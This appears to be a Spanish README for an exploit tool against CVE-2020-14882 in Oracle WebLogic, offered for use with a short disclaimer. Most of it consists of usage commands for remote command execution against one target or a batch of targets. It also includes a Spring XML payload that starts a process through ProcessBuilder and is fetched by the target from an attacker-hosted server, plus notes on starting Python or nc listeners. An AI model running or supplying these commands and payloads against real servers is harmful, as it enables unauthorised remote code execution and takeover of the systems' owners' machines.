
Herramienta de explotación integral CVE-2020-14882_ALL, admite detección de eco de comandos, eco de comandos por lotes, ejecución de comandos sin eco mediante XML externo y otras funcionalidades.
CVE-2020-14882_ALL es una herramienta de explotación integral que admite detección de eco de comandos, eco de comandos por lotes, ejecución de comandos sin eco mediante archivos xml externos, etc.
Módulos requeridos: requests, http.client
(La herramienta está destinada únicamente a pruebas de seguridad autorizadas; no la utilice con fines ilegales. El autor no se hace responsable por el uso indebido de la misma.)
Versiones conocidas del módulo de eco de comandos: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
Formato de target.txt: http://x.x.x.x:xx, uno por línea.

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
</list>
</constructor-arg>
</bean>
</beans>
Inicie la escucha con Python.

Inicie la escucha con nc.

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

